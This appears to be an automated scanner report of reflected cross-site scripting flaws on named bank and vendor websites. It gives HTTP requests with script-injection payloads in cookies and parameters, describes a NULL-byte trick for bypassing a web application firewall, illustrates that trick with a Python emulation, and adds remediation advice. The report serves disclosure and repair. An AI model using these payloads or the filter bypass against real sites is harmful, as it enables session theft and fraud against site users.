GET /en/lost-password-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en54038"><script>alert(1)</script>1e95dab8e0e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb1d"><script>alert(1)</script>cfcda14f30a was submitted in the mbfcookie[lang] cookie. This input was echoed as deb1d\"><script>alert(1)</script>cfcda14f30a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/partner-portal-home.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endeb1d"><script>alert(1)</script>cfcda14f30a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b457f"><script>alert(1)</script>667bdae159f was submitted in the mbfcookie[lang] cookie. This input was echoed as b457f\"><script>alert(1)</script>667bdae159f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?option=com_content&task=view&id=296&Itemid=297 HTTP/1.1
Host: www.arbornetworks.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; mbfcookie[lang]=enb457f"><script>alert(1)</script>667bdae159f; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.2.10.1296689848
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8239"><script>alert(1)</script>31f3540dcc0 was submitted in the mbfcookie[lang] cookie. This input was echoed as d8239\"><script>alert(1)</script>31f3540dcc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=end8239"><script>alert(1)</script>31f3540dcc0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bddb"><script>alert(1)</script>119487711af was submitted in the mbfcookie[lang] cookie. This input was echoed as 1bddb\"><script>alert(1)</script>119487711af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /register.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1bddb"><script>alert(1)</script>119487711af; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0853'%3balert(1)//b444241d7da was submitted in the BOA_0020 cookie. This input was echoed as b0853';alert(1)//b444241d7da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/Control.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853'%3balert(1)//b444241d7da; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:17 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00004QCD_ZjewAQatQwb0kn5dXN:12qb4kb6q; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:16 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Descri ...[SNIP]...
<!--
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fed0'%3balert(1)//f83f2273ab8 was submitted in the BOA_0020 cookie. This input was echoed as 3fed0';alert(1)//f83f2273ab8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0'%3balert(1)//f83f2273ab8; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:15 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000CnfCKRIifEAopeDjObSoiF3:12qb4k93q; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:14 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Descri ...[SNIP]...
<!--
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0296'%3balert(1)//224de741dab was submitted in the BOA_0020 cookie. This input was echoed as a0296';alert(1)//224de741dab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296'%3balert(1)//224de741dab; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000iSQjObSnt8ukh_g0-dQwNmC:12qb4k2ev; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:38 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Descript ...[SNIP]...
<!--
2.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://www.merrilledge.com
Path: /m/pages/merrill-edge-advisory-center.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9e1d"><script>alert(1)</script>a47d51819dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9e1d"><script>alert(1)</script>a47d51819dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?%00f9e1d"><script>alert(1)</script>a47d51819dc=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0095641'%3b9ef12e8200f was submitted in the src_cd parameter. This input was echoed as 95641';9ef12e8200f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
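The NULL-byte bypass reported in the two merrilledge findings above, and earlier against www.arbornetworks.com, comes down to a mismatch in string representation between the filter and the application. The following Python example is added here for illustration; it is not code from the report or from any of the scanned sites. It emulates C NUL-terminated string semantics in Python rather than calling into libc, and the blocked-pattern list, the attribute sink and the assumption that the runtime drops the NUL before echoing (which is what the echoed value in the finding suggests) are constructed for the example.

```python
from urllib.parse import unquote_to_bytes

# Signatures a simple filter might look for (constructed for this example).
BLOCKED_PATTERNS = (b"<script", b"javascript:", b"onerror=")


def c_string_view(buf: bytes) -> bytes:
    """Emulate what strstr()/strcasestr() see in a C buffer: the bytes up to the
    first NUL and nothing after it. This is an emulation, not a call into libc."""
    nul = buf.find(b"\x00")
    return buf if nul < 0 else buf[:nul]


def native_waf_blocks(raw_param: bytes) -> bool:
    """A native-code WAF: URL-decode the parameter into a buffer, then scan the
    buffer with NUL-terminated string semantics."""
    decoded = c_string_view(unquote_to_bytes(raw_param)).lower()
    return any(p in decoded for p in BLOCKED_PATTERNS)


def length_aware_waf_blocks(raw_param: bytes) -> bool:
    """The fix on the WAF side: scan the full decoded length (memmem-style),
    so an embedded NUL cannot hide what follows it."""
    decoded = unquote_to_bytes(raw_param).lower()
    return any(p in decoded for p in BLOCKED_PATTERNS)


def application_view(raw_param: bytes) -> str:
    """What a managed runtime (PHP, ASP.NET, Java) receives: its strings carry an
    explicit length, so the bytes after the NUL survive. The finding shows the
    NUL itself did not reach the page; dropping it is an assumption made here."""
    return unquote_to_bytes(raw_param).replace(b"\x00", b"").decode("latin-1")


def render_attribute_unencoded(value: str) -> str:
    """The vulnerable sink from the report: user data inside a double-quoted
    attribute with no output encoding (constructed template)."""
    return '<input type="hidden" name="p" value="' + value + '">'


def demo(raw_param: bytes) -> dict:
    """Compare the three views of one URL-encoded request parameter."""
    page = render_attribute_unencoded(application_view(raw_param))
    return {
        "native_waf_blocks": native_waf_blocks(raw_param),
        "length_aware_waf_blocks": length_aware_waf_blocks(raw_param),
        "script_reaches_page": "<script" in page,
    }


if __name__ == "__main__":
    # Payload from the merrilledge finding, with and without the leading %00.
    payload = b'f9e1d"><script>alert(1)</script>a47d51819dc'
    for raw in (payload, b"%00" + payload):
        print(raw, demo(raw))
```

With the plain payload all three views agree and the filter blocks it; with `%00` in front, the native-style scan sees an empty string and passes the request, while the application still renders the `<script>` tag. The NUL can sit anywhere before the blocked characters, which is why the report says "anywhere before": everything after the first NUL is invisible to the C-string scan.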
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c13e'-alert(1)-'c4f9da1816c was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /IRA/pages/home.aspx HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pxs=689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c; SMIDENTITY=...[SNIP]...; pxv=4B1B9E90-7DD2-4095-A535-9FE88031C408; CMAVID=none; cmTPSet=Y; BrowserCheckDone=true;
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten ...[SNIP]...
<![CDATA[
lpAddVars('page','section','Home');
lpAddVars('page','ConversionStage','Home');
lpAddVars('page','Session ID','689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c');
var cookieExists=false;Sys.Application.initialize();
Sys.Application.add_init(function() { $create(MerrillLynch.Application.ECMS.WebUI.ECMSContentCtrl, {"Application":"IRA","ContentLocations ...[SNIP]...